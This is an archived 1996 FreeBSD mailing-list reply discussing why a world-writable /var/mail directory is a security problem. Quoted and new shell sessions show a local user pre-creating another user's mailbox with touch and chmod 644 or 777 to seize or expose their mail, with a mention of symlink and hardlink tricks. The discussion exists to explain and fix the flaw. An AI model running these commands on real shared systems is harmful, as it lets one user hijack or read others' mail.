Date:      Thu, 31 Oct 1996 13:59:07 +0100 (MEZ)
From:      "Hr.Ladavac" <lada@ws2301.gud.siemens.co.at>
To:        michaelh@cet.co.jp (Michael Hancock)
Cc:        terry@lambert.org, dubois@primate.wisc.edu, current@freebsd.org
Subject:   Re: /var/mail (was: re: Help, permission problems...)

E-mail message from Michael Hancock contained:
> On Wed, 30 Oct 1996, Terry Lambert wrote:
>
> > > Also, perhaps I missed it in this discussion, but just what *is*
> > > the security problem WRT having /var/mail set to 1777?
> >
> > % id
> > uid=501(terry) gid=20(staff) groups=20(staff), 0(wheel), 552(ncvs)
> > % touch /var/mail/dubois
> > % chmod 644 !$
> > % ls -l !$
> > -rw-r--r--  1 terry  wheel      0 Oct 30 17:02 /var/mail/dubois
> > % mail -s "pay me a dollar to unlock your mail" dubois < /dev/null
> > Null message body; hope that's ok
> > %
>
> The work around is to use mailer readers that truncate instead of remove
> the file when all messages have been deleted or moved.

How about:

user is not yet there, but will be ... or he didn't receive any mail yet.

% whoami
nasty

% touch /var/mail/user
% chmod 777 $!
% mail -s "pay me a dollar to make your mail world unreadable" user < /dev/null

Not to mention nice things you can do with symlinks, hardlinks, you-name-it...

/Marino